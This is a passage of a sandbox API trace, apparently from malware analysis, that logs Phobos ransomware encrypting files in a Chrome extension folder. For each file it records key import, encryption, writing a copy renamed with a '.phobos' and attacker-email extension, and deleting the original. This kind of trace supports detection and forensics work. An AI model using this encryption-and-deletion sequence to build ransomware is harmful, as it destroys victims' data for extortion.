halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0153.414] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0153.414] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.414] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1378, lpOverlapped=0x0) returned 1 [0153.465] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1380, dwBufLen=0x1380 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1380) returned 1 [0153.465] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1380, lpOverlapped=0x0) returned 1 [0153.466] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0153.466] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.466] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30, dwBufLen=0x30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30) returned 1 [0153.466] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.467] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe2, lpOverlapped=0x0) returned 1 [0153.467] CryptDestroyKey (hKey=0xa32da8) returned 1 [0153.467] CloseHandle (hObject=0x14c) returned 1 [0153.467] CloseHandle (hObject=0x15c) returned 1 [0153.467] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png")) returned 1 [0153.468] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0153.468] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0153.469] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=4355) returned 1 [0153.469] CloseHandle (hObject=0x15c) returned 1 [0153.470] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js")) returned 0x2020 [0153.470] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.470] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0153.470] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.470] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.470] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0153.471] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0153.471] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.472] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1103, lpOverlapped=0x0) returned 1 [0153.550] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1110, dwBufLen=0x1110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1110) returned 1 [0153.550] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1110, lpOverlapped=0x0) returned 1 [0153.551] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0153.551] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.551] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0153.551] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0153.551] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0153.551] CryptDestroyKey (hKey=0xa32da8) returned 1 [0153.551] CloseHandle (hObject=0x15c) returned 1 [0153.551] CloseHandle (hObject=0x14c) returned 1 [0153.552] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js")) returned 1 [0153.553] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0153.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0153.553] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=23404) returned 1 [0153.553] CloseHandle (hObject=0x14c) returned 1 [0153.553] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js")) returned 0x2020 [0153.553] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0153.553] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.553] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0153.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0153.554] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0153.554] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0153.554] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5b6c, lpOverlapped=0x0) returned 1 [0153.951] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5b70, dwBufLen=0x5b70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5b70) returned 1 [0153.952] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x5b70, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x5b70, lpOverlapped=0x0) returned 1 [0154.474] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0154.474] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.474] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0154.474] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.474] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0154.475] CryptDestroyKey (hKey=0xa32da8) returned 1 [0154.475] CloseHandle (hObject=0x14c) returned 1 [0154.475] CloseHandle (hObject=0x15c) returned 1 [0154.522] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js")) returned 1 [0154.523] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.523] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=207) returned 1 [0154.523] CloseHandle (hObject=0x14c) returned 1 [0154.523] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json")) returned 0x2020 [0154.523] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.524] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.524] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.524] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0154.524] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.524] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xcf, lpOverlapped=0x0) returned 1 [0154.525] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0, dwBufLen=0xd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0) returned 1 [0154.525] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd0, lpOverlapped=0x0) returned 1 [0154.526] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0154.526] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.526] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.526] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.526] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.526] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.527] CloseHandle (hObject=0x14c) returned 1 [0154.527] CloseHandle (hObject=0x130) returned 1 [0154.527] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ca\\messages.json")) returned 1 [0154.528] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.528] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=173) returned 1 [0154.528] CloseHandle (hObject=0x130) returned 1 [0154.528] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json")) returned 0x2020 [0154.528] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.528] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.529] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.529] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0154.529] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.529] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xad, lpOverlapped=0x0) returned 1 [0154.530] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0154.530] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb0, lpOverlapped=0x0) returned 1 [0154.531] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0154.531] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.531] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, 